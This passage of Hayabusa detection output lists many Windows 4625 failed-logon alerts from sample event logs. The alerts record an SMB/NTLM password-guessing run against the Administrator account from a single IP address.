AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: 